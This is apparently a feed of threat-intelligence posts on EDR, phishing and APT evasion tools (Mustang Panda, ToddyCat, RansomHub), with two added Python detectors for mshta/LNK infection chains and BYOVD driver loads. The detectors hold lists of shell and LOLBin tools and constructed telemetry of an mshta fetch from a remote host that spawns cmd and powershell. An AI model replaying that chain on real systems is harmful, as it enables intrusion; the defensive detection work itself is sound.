EDR for Windows: fundamentals, architecture, and how it works

In the previous articles (1, 2, 3) of this series on event collection in Windows and Linux, we looked at which types of event sources matter for monitoring from an information-security standpoint, and at how the corresponding events are collected and forwarded to monitoring systems, including collection via agents.

https://habr.com/ru/companies/securityvison/articles/905842/

#information_security #event_auditing #edr #antivirus


Habr

Emerging Phishing Techniques: New Threats and Attack Vectors

This analysis delves into four sophisticated phishing techniques observed in 2025. These include embedding Base64-encoded JavaScript in SVG files, hiding malicious URLs in PDF annotations, using OneDrive links to deliver dynamic phishing content, and nesting MHT files within OpenXML documents. These methods successfully evaded email protections and reached intended victims, demonstrating the increasing sophistication of threat actors. The techniques exploit unconventional file formats, cloud-based platforms, and structural obfuscation to bypass traditional security measures. The findings emphasize the need for improved detection mechanisms, deeper inspection of file structures, and advanced context-aware parsing in email and document security tools.

Pulse ID: 680fac676d706a8fdbc062ab
Pulse Link: https://otx.alienvault.com/pulse/680fac676d706a8fdbc062ab
Pulse Author: AlienVault
Created: 2025-04-28 16:27:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cloud #CyberSecurity #EDR #Email #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PDF #Phishing #RAT #SMS #SVG #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Difficulty of bypassing EDRs: a ransomware operator's perspective

In the world of hacking and ransomware attacks, evading a system's defenses is one of the top priorities of attack...

This is a really nice write-up from Sekoia with lots of #ThreatDetection details, regardless of the #EDR you're using.

🔎 Of particular note, this attack is aided with a .LNK file pulling in a .HTA via a remote location.

🕵🏼‍♂️ Detect .LNK files making external connections; they are particularly easy to tune.

🕵🏼‍♂️ Detect mshta.exe running suspicious executables (e.g. cmd.exe).

Happy #ThreatHunting

🔗 https://blog.sekoia.io/detecting-multi-stage-infection-chains-madness/

Detecting Multi-Stage Infection Chains Madness

Learn about detecting multi-stage infection chains using Cloudflare tunnel infrastructures delivering RATs.

Sekoia.io Blog
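The two hunts suggested in the post, as an added example that is not code from the post or from Sekoia. The events are constructed, Sysmon-shaped dicts (Event ID 1 = ProcessCreate, Event ID 3 = NetworkConnect); a real pipeline would feed parsed Sysmon or EDR telemetry instead. One assumption worth stating: Sysmon does not log the .LNK file itself, so "a .LNK making an external connection" is approximated here as a script host (mshta.exe, wscript.exe, ...) whose parent is explorer.exe (what a double-clicked shortcut looks like) opening a connection to a non-internal address. The external address 203.0.113.10 is a TEST-NET-3 documentation address standing in for an attacker host.

```python
"""Detect the .LNK -> mshta.exe -> cmd.exe chain with Sysmon-style events.

Added example, not code from the Sekoia post. SAMPLE_EVENTS is constructed.
"""
import ipaddress
import ntpath
import re

# Script hosts a shortcut typically launches; shells/LOLBins mshta.exe should not spawn.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "rundll32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Remote content: an http(s) URL or a UNC path (two leading backslashes) on the command line.
REMOTE_RE = re.compile(r"https?://|\\\\", re.IGNORECASE)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

SAMPLE_EVENTS = [  # constructed telemetry
    {"EventID": 1, "ProcessGuid": "{A}", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/stage.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessGuid": "{A}", "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{B}", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c start /min powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    # benign noise: a normal shortcut launch and an internal SMB connection
    {"EventID": 1, "ProcessGuid": "{C}", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessGuid": "{D}", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()


def is_external(ip):
    """True unless the address falls in an RFC 1918, loopback or link-local range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def detect(events):
    """Return (rule, ProcessGuid) alerts in event order."""
    alerts = []
    # Index process creations so network events can be tied back to their lineage.
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    for e in events:
        if e["EventID"] == 1:
            image, parent = basename(e["Image"]), basename(e["ParentImage"])
            if image == "mshta.exe" and REMOTE_RE.search(e.get("CommandLine", "")):
                alerts.append(("mshta_remote_content", e["ProcessGuid"]))
            if parent == "mshta.exe" and image in SHELLS:
                alerts.append(("mshta_spawns_shell", e["ProcessGuid"]))
        elif e["EventID"] == 3:
            proc = procs.get(e["ProcessGuid"])
            if (proc and basename(proc["ParentImage"]) == "explorer.exe"
                    and basename(proc["Image"]) in SCRIPT_HOSTS
                    and is_external(e["DestinationIp"])):
                alerts.append(("lnk_launched_host_external_connection", e["ProcessGuid"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The explorer.exe-parent rule is the one that needs tuning per environment (logon scripts and software shortcuts that legitimately call wscript.exe or powershell.exe will hit it); the mshta.exe rules rarely fire outside an intrusion.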

Latest Mustang Panda Arsenal: Toneshell, StarProxy, PAKLOG, CorKLOG, and SplatCloak

Mustang Panda, a threat actor group, has developed new tools including two keyloggers (PAKLOG and CorKLOG) and an EDR evasion driver (SplatCloak). PAKLOG monitors keystrokes and clipboard data, using a custom encoding scheme. CorKLOG captures keystrokes, encrypts data with RC4, and establishes persistence through services or scheduled tasks. SplatCloak disables kernel-level notification callbacks for Windows Defender and Kaspersky drivers, employing obfuscation techniques like control flow flattening and mixed boolean arithmetic. Along with those tools, the group has been observed using updated versions of ToneShell and a new tool called StarProxy. ToneShell, a backdoor, now features changes in its FakeTLS C2 communication protocol and client identifier storage methods. StarProxy, a lateral movement tool, uses the FakeTLS protocol to proxy traffic and facilitate attacker communications.

Pulse ID: 6800148cd0bb0e7851cc6218
Pulse Link: https://otx.alienvault.com/pulse/6800148cd0bb0e7851cc6218
Pulse Author: AlienVault
Created: 2025-04-16 20:35:24

#BackDoor #Clipboard #CyberSecurity #EDR #InfoSec #Kaspersky #KeyLogger #OTX #OpenThreatExchange #Proxy #TLS #Windows #bot #AlienVault

Pick your Poison - A Double-Edged Email Attack

A sophisticated cyber-attack has been identified by the Cofense Phishing Defense Center, combining phishing techniques targeting Office365 credentials with malware delivery. The campaign uses a file deletion reminder as bait, exploiting a legitimate file-sharing service to increase credibility. Users are led to a fake Microsoft login page or prompted to download malware disguised as a OneDrive installer. The attack employs ConnectWise RAT, a legitimate remote administration tool exploited for malicious purposes. The malware establishes persistence through system services and registry modifications, highlighting the need for enhanced user awareness and education to combat such dual-threat approaches.

Pulse ID: 67f59820a8fab9815ec86721
Pulse Link: https://otx.alienvault.com/pulse/67f59820a8fab9815ec86721
Pulse Author: AlienVault
Created: 2025-04-08 21:41:51

#ConnectWise #CyberSecurity #EDR #Edge #Education #Email #FileSharing #InfoSec #Malware #Microsoft #OTX #Office #OpenThreatExchange #Phishing #RAT #bot #AlienVault

How ToddyCat tried to hide behind AV software

The ToddyCat APT group has developed a sophisticated tool called TCESB to stealthily execute payloads and evade detection. This tool exploits a vulnerability (CVE-2024-11859) in ESET Command line scanner for DLL proxying, using a modified version of the open-source EDRSandBlast malware. TCESB employs techniques like DLL proxying, kernel memory manipulation, and Bring Your Own Vulnerable Driver (BYOVD) to bypass security solutions. It searches for kernel structure addresses using CSV or PDB files, installs a vulnerable Dell driver, and decrypts AES-128 encrypted payloads. The discovery highlights the need for monitoring driver installations and Windows kernel debug symbol loading events to detect such sophisticated attacks.

Pulse ID: 67f3cb12758e286216442770
Pulse Link: https://otx.alienvault.com/pulse/67f3cb12758e286216442770
Pulse Author: AlienVault
Created: 2025-04-07 12:54:42

#CyberSecurity #Dell #EDR #ESET #InfoSec #Malware #OTX #OpenThreatExchange #Proxy #RCE #Vulnerability #Windows #bot #AlienVault

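The ToddyCat pulse above ends with the recommendation to monitor driver installations; the Mustang Panda pulse earlier on this page (SplatCloak removing kernel callbacks) argues for the same telemetry. The triage below is an added example, not code from either pulse or from the underlying reports. It parses Sysmon DriverLoad records (Event ID 6) and scores them on three signals a BYOVD install usually trips: a hash on a vulnerable-driver blocklist, a missing or invalid signature, and a load path outside the normal driver directories. Both records and the blocklist entry are constructed; the hash is a placeholder, and a real deployment would load Microsoft's vulnerable-driver blocklist or a feed such as LOLDrivers instead.

```python
"""Triage Sysmon DriverLoad (Event ID 6) records for BYOVD-style driver installs.

Added example; not code from the pulse or from the original report. The two
records below are constructed and the blocklist hash is a placeholder.
"""
import xml.etree.ElementTree as ET

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

PLACEHOLDER_BLOCKLISTED = "0" * 64  # stands in for a real vulnerable-driver SHA256
KNOWN_VULNERABLE_SHA256 = {
    PLACEHOLDER_BLOCKLISTED: "placeholder: known-abusable OEM utility driver",
}
# Where a legitimately installed driver normally loads from.
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)

BENIGN_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>6</EventID></System>
  <EventData>
    <Data Name="ImageLoaded">C:\Windows\System32\drivers\tcpip.sys</Data>
    <Data Name="Hashes">SHA256=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</Data>
    <Data Name="Signed">true</Data>
    <Data Name="Signature">Microsoft Windows</Data>
    <Data Name="SignatureStatus">Valid</Data>
  </EventData>
</Event>"""

# Validly signed third-party driver dropped into a user-writable directory: the BYOVD pattern.
SUSPECT_EVENT = rf"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>6</EventID></System>
  <EventData>
    <Data Name="ImageLoaded">C:\Users\Public\oemtool.sys</Data>
    <Data Name="Hashes">SHA256={PLACEHOLDER_BLOCKLISTED}</Data>
    <Data Name="Signed">true</Data>
    <Data Name="Signature">Example OEM Inc.</Data>
    <Data Name="SignatureStatus">Valid</Data>
  </EventData>
</Event>"""


def parse_driver_load(xml_text):
    """Return the fields of a DriverLoad record, or None if the event is not Event ID 6."""
    root = ET.fromstring(xml_text)
    if root.findtext(f"{EVT_NS}System/{EVT_NS}EventID") != "6":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{EVT_NS}Data")}
    # Sysmon packs hashes as "SHA256=...,MD5=..."; keep whichever algorithms are present.
    hashes = dict(kv.split("=", 1) for kv in data.get("Hashes", "").split(",") if "=" in kv)
    return {
        "image": data.get("ImageLoaded", ""),
        "sha256": hashes.get("SHA256", "").lower(),
        "signed": data.get("Signed", "").lower() == "true",
        "signature": data.get("Signature", ""),
        "status": data.get("SignatureStatus", ""),
    }


def triage(record):
    """Score a parsed DriverLoad record: {"severity": none|medium|high, "reasons": [...]}."""
    reasons = []
    image = record["image"].lower()
    blocklisted = record["sha256"] in KNOWN_VULNERABLE_SHA256
    unusual_path = not image.startswith(TRUSTED_DRIVER_DIRS)
    third_party = "microsoft" not in record["signature"].lower()
    if blocklisted:
        reasons.append("hash on vulnerable-driver blocklist")
    if not record["signed"] or record["status"] != "Valid":
        reasons.append("unsigned or invalid signature")
    if unusual_path:
        reasons.append("loaded from outside the driver directories")
    # A validly signed vendor driver is exactly what BYOVD abuses, so signature
    # alone is not reassuring; signer plus path is the discriminating pair.
    if blocklisted or (third_party and unusual_path):
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons}


if __name__ == "__main__":
    for evt in (BENIGN_EVENT, SUSPECT_EVENT):
        print(triage(parse_driver_load(evt)))
```

Third-party drivers loading from the DriverStore are routine, which is why the path check matters more than the signer; a non-Microsoft driver appearing under a user profile, Temp or ProgramData is worth an immediate look regardless of what the hash feed says.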
EDR-as-a-Service makes the headlines in the cybercrime landscape

Cybercriminals exploit compromised accounts for EDR-as-a-Service (Emergency Data Requests - EDR), targeting major platforms

Security Affairs

It's dizzying to see how organized these #RaaS (#ransomware services) are. Thanks to the folks at @ESETresearch for giving us their report on #ransomHub and the #EDR killers: https://www.welivesecurity.com/es/investigaciones/edrkillshifter-ransomhub-grupos-rivales/

RansomHub: links to rival groups and EDRKillShifter as a key tool

ESET Research analyzes the ransomware landscape, reveals links between RansomHub and other groups, and examines the emerging role of EDR killers such as EDRKillShifter.